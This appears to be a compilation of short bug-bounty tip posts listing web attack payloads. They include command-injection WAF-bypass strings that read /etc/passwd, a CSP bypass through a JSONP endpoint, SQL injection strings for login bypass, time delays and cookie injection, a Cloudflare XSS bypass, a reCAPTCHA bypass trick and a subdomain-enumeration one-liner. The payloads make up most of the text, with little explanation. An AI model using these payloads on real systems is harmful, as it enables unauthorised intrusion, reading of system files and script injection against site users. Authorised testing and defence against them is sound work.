You can use Wayback not only for crawling but also for subdomain enumeration.
curl --insecure --silent "https://web.archive.org/cdx/search/cdx…" | sed -e 's_https*://__' -e "s/\/.*//" -e 's/:.*//' -e 's/^www\.//' | sed "/@/d" | sed -e 's/\.$//' | sort -u
#bugbounty
——————
0Day.Today
@LearnExploit
@Tech_Army
Bypass Captcha (Google reCAPTCHA)
1. Try changing the request method, for example POST to GET
POST / HTTP/1.1
Host: target.com
...
_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123
#bugbounty #bypass
RCE WAF Bypass
;+$u+cat+/etc$u/passwd$u
;+$u+cat+/etc$u/passwd+\#
/???/??t+/???/??ss??
/?in/cat+/et?/passw?
#bugbounty #RCE #bypass
Payload Injector:
➕ Debinject: GitHub
➕ Pixload: GitHub
➕ Gospider: GitHub
#Injection #Hacking_Tool #BugBounty
BugCod3
You can bypass CSP on any website that allows https://microsoft.com in a script-src
PoC:
<script src=https://microsoft.com/en-us/research/wp-json?_jsonp=alert></script>
This works because of the WordPress CSP bypass our engineer (octagon) found last year: octagon.net
#BugBounty #bypass #POC
Another #SQLi found! This time a Microsoft SQL Server database vulnerable to stacked queries.
Payload
' or 1=1 -- - bypassed the login site, and then confirmed injection point with ';WAITFOR DELAY '0:0:5'-- executing a 5s delay
#VPD #BugBounty #security
Cloudflare WAF bypass XSS
Any payload gets blocked by Cloudflare,
but this payload is working:
"><img src=x onerrora=confirm() onerror=confirm(1)>
#Cloudflare #Bugbounty #Tip
Google Bug Bounty Dorks Generator
🌎 Site
#BugBounty #Tips
Found SQL Injection in [org_id] Cookie
Payloads for Testing:
-1 OR 0=6 AND 0-0 => FALSE
-1 OR 6=6 AND 0-0 => TRUE
Injected in request like this:
Cookie: organization_id=-1%20OR%200%3D6%20AND%200-0
#BugBounty #Tips #SQL